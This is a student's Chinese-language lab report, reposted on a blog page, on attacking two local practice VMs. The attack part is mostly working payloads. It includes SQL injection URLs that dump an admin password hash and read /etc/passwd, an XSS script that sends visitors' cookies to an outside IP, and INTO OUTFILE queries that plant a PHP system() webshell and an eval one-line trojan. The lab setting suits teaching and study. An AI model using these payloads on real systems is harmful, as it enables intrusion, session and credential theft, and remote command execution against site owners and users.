实验报告 五

最新推荐文章于 2022-11-09 23:27:12 发布
最新推荐文章于 2022-11-09 23:27:12 发布
阅读量247 收藏
点赞数
文章标签: php 数据库 运维
原文链接:http://www.cnblogs.com/P201521410043/p/8906642.html
版权

1.sql注入

首先搭建虚拟机 用kali扫描下当前网段 发现一个192.168.138.134的可疑ip地址

打开该虚拟机提供的网页 使用发现可能存在sql注入点

http://192.168.138.134/cat.php?id=1

http://192.168.138.134/cat.php?id=1'

 

 

使用order by语句试出网站后台数据库表的列数 当order by 5 时网页报错 因此该查询涉及到四列元素

 

 

 

 

使用联合查询 查看网页的显示位

 

 发现2是回显位,发现数据库的名字为photoblog

 

http://192.168.138.134/cat.php?id=-2%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%27photoblog%27

顺势查到数据库中的表,可见users表对我们有用

http://192.168.138.134/cat.php?id=-2%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%27users%27

继续查询users表中列名,有变量名 id,login,password

 查看users表中的数据:id=1 login=admin password=8efe310f9ab3efeae8d410a8e0166eb2

http://192.168.138.134/cat.php?id=-1%20union%20select%201,group_concat(id,0x23,login,0x23,password),3,4%20from%20users

 

 

 

jiemi

MD5解密后,得到密码P4ssw0rd

 

登录到管理员页面

尝试上传文件,发现nophp

改完后缀名发现,可以绕过,并上传成功

 

 得到目录,用菜刀连一下

 

 

 

2.xss靶机攻击

nmap 扫描一下发现靶机开着80端口和ssh协议

发现有弹窗回显,存在xss漏洞

在靶机上留言<script>document.write('<img src="http://192.168.138.139/?'+document.cookie+' "/>')</script>

可以将任意登录用户的cookie发送到指定ip 在指定 ip 接受 cookie 后可以伪造成登陆者

在原来机器上登录admin账户,密码P4ssw0rd

刷新下页面,发现已经已admin的身份登录进页面中。

进入管理界面后,发现博客编辑界面存在sql注入漏洞。

 

http://192.168.138.135/admin/edit.php?id=4 union select 1,2,3,4

发现2和3可以显示出来。

 

http://192.168.138.135/admin/edit.php?id=0 union select 1,2,load_file("/etc/passwd"),4

可以读取passwd文件,但是不能读取shadow文件。我们尝试能不能创建一个文件。

在编辑页面发现错误提示中有/var/www/classes 目录,

 

尝试后发现/var/www/css 目录可写。

于是构造语句:

http://192.168.138.135/admin/edit.php?id=2%20union%20select%201,2,3,4%20into%20outfile%20%22/var/www/css/s.php%22

然后打开

http://192.168.138.135/css/s.php

说明s.php文件成功写入到/var/www/css 目录,下面将

<?php system($_GET['c']); ?>

写入z.php中,构造url为:

http://192.168.138.135/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20system($_GET[%27c%27]);%20?%3E%22,4%20into%20outfile%20%22/var/www/css/z.php%22

访问z.php,并使用uname -a获取系统信息。可以远程执行命令。

下面写入一句话木马,构造url:

http://192.168.138.135/admin/edit.php?id=2%20union%20select%201,2,%22%3C?php%20@eval($_POST[%27chopper%27]);?%3E%22,4%20into%20outfile%20%22/var/www/css/dao.php%22

 

转载于:https://www.cnblogs.com/P201521410043/p/8906642.html

ayg64628
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【愚公系列】2023年05月 Web渗透测试之攻击内网Redis
时光隧道
08-24 5万+
Redis的内网渗透是指攻击者利用漏洞或者弱密码进入Redis服务器所在的内网,然后利用Redis服务本身的漏洞或者弱密码拿到Redis服务器的控制权,并继续向内网内的其他计算机和服务发起攻击。这种攻击方式在内部网络防火墙被绕过的情况下非常有效,因此需要加强Redis本身的安全保护措施,并加强内网安全防范措施。
利用web漏洞入侵网站并控制服务器、Web漏洞原理与利用
最新发布
m0_73650888的博客
04-16 1716
经过本次实验,我深刻了解了网络无安全这句话,了解了端口扫描和漏洞扫描,并掌握了多种软件的使用,掌握了端口及漏洞扫描的一些基本知识,掌握一些网络入侵的基本流程,并且让我可以了解到远程主机所存在的一些问题。2、选择Options-Configuration命令,此时打开Options对话框,在这里可以设置扫描属性,包括扫描时延、线程优先级、线程数量、扫描IP/Port列表设置等选项。应用池程序 --defaultapppool--高级设置--常规--启用32位应用程序--True。
典型Web攻击(网络空间安全实训)
qq_44047806的博客
06-07 1980
典型****Web攻击 1.实验内容与环境 1.1实验内容 SQL注入、XSS、CSRF、文件上传、目录遍历(SQL注入必做,其它四选一)。可以基于如下实验环境,也可以百度“实验楼”等实验环境,或采用google hacking方式在网上找“合适的”目标系统(适可而止)。SQL注入若只是“万能钥匙”方式登录目标系统,则成绩为及格,适当进一步攻击(可以借助啊D等工具),则可获中等及以上成绩,最高境界是SQL注入至获取数据库表内容。 1.2实验环境 操作系统:Windows10 CPU:I7-8450H 内存:
2021年网络空间安全web题目
qq_57147160的博客
11-19 2116
首先这道题目与ctf还是有点关系的,首先看一下题目: 通过浏览器访问http://靶机服务器IP/1,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;(2分) 通过浏览器访问http://靶机服务器IP/2,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;(2分) 通过浏览器访问http://靶机服务器IP/3,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内
Web安全:实验4-FTP协议分析实验
lyy_g的博客
12-26 6092
警示:实验报告如有雷同,雷同各方当次实验成绩均以0分计;在规定时间内未上交实验报告的,不得以其他方式补交,当次成绩按0分计;实验报告文件以PDF格式提交。   院系 数据科学与计算机学院 班级 15级4班 学号 15331145 姓名 李果 完成日期:  2017年  12  月  25
实验一报告
c77777_的博客
09-17 298
内容: 建立n个元素顺序表,实现相关的操作:输出,插入,删除,查找的功能。    源程序代码:     #include using namespace std; const int MaxSize=100; template    // 定义模板类SeqList class SeqList {  public:   SeqList(){length=0;}
实验三报告
S200142的博客
11-09 1453
交通工程专业2019级曾培圣王世广汽车与交通工程学院2022年1月复杂网络导论基于购物物流数据的中国快递运输网络分析2021年12月——2022年1月以个人购物订单的物流数据为基础,使用复杂网络建模及分析方法构建中国境内各快递物流站点、线路的网络,分析不同快递公司的快递网络特性,尝试总结规律、发现问题并提出优化建议。本实验为拓展性实验。可根据个人购物经历选择至少两个快递公司进行实验,在分析部分完整的基础上,每增加一个快递公司,根据全班实验情况酌情加分,最多满分。
实验报告5
08-08
实验报告5 - 数字图像处理之图像压缩编码 在数字图像处理中,图像压缩编码是一种非常重要的技术,它可以大大减少图像的存储空间和传输时间。实验报告5的主要目的就是理解游程编码和离散余弦变换两种图像压缩编码...
云计算技术实验报告Hadoop IO
06-21
Linux,eclipse 要求改写实验4的GetMerge程序,实现将云端多个文件压缩到单个文件下载到本地。 1)采用Gzip压缩方法,本地文件为Merger.gz; 2)云端文件需要超过2个文件。
实验报告信号的采样与恢复
11-25
实验报告信号的采样与恢复 本实验报告主要讨论了信号采样和恢复的原理和过程,并通过实验验证了抽样定理。在实验中,我们使用了信号与系统实验箱、系统时域与频域分析模块和双踪示波器等设备,观察了抽样脉冲、...
Web攻防实验报告
01-24
Web攻防实验报告,设计WebGoat攻击和预防以及XSS攻击预防的详细实验步骤,了解Web攻防原理
web实验报告
03-27
图书馆管理系统是采用JAVA做前台,后台数据库则采用的是MySQL5.1,本系统提供7个功能模块,分别是系统设置、读者管理、图书管理、图书借还、系统查询、更改口令,以及退出系统模块。这7个模块里又有许多子模块,通过这些模块之间的相互连接与配合,完成操作员发出的各种指令。 图书馆管理系统是一个供内部人员使用的系统,管理员能够使用系统设置、读者管理、图书管理、图书借还、系统查询、更改口令,以及退出系统功能。
WEB实验报告
04-07
还为实验报告而苦恼么,快来看看吧!虽然不是很好,可是一点借鉴意义还是有的哦
Linux实验报告.docx
01-08
Linux实验报告.docx
Verilog流水灯实验报告
05-09
Verilog流水灯实验报告 Verilog是一种基于事件驱动的硬件描述语言,广泛应用于数字电路设计和验证。流水灯实验是Verilog的经典实验之一,本实验报告将详细介绍流水灯实验的设计思路、设计框图、实验步骤和实验结果...
【愚公系列】2023年05月 Web渗透测试之Tomcat AJP协议攻击
热门推荐
时光隧道
08-25 5万+
Tomcat AJP协议攻击是一种利用Tomcat应用服务器中的AJP(Apache JServ 协议)协议漏洞或存在弱口令等安全问题的攻击方式。攻击者通过AJP协议访问Tomcat应用服务器的服务端口,从而获得未授权的对应用程序的访问权限。攻击者可以利用该漏洞实施远程代码执行攻击、敏感信息泄露等多种攻击手段。为有效遏制此类攻击,应当及时修复漏洞,并加强对应用程序的访问控制。
实战:WEB攻击之网页脚本攻击试验
weixin_34288121的博客
06-04 331
2019独角兽企业重金招聘Python工程师标准>>> ...
风云杯大学生信安大赛(Web部分题解)
saltor
05-15 1万+
PS:菜鸟一枚,只做出了7题,第8,9题见过类似的但还是不会。。。还是坐等大神们的wp吧。WEB01http://139.129.166.67/4t56ysgh6h7u/ 答案格式:仅输入{ }花括号中的内容 分值 50 本题考查的是正则表达式页面源码:<?php highlight_file('2.php'); $key='KEY{*****************************
web安全实验:Attack1-6
HizT_1999的博客
06-24 2605
Attack 1: Warn-up exercise: Cookie Theft 开始网址 http://localhost:3000/profile?username= 评分员将提前以user1的身份登录bitbar,然后打开以上的开始网址 你的目标是偷取user1的会话cookie并且将cookie发送到 http://localhost:3000/steal_cookie?cookie=…cookie_data_here… 你可以在以下网址上查看最近被偷取的cookie http://loca
mysql实验报告存储过程_【MySQL实验报告5(存储过程与函数)(1)(1)】 mysql存储过程详解...
05-29
MySQL实验报告5(存储过程与函数) 一、实验目的 了解MySQL中存储过程和函数的基本概念和使用方法,掌握存储过程和函数的创建、调用、修改和删除。 二、实验环境 - 操作系统:Windows 10 - 数据库管理系统:MySQL ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值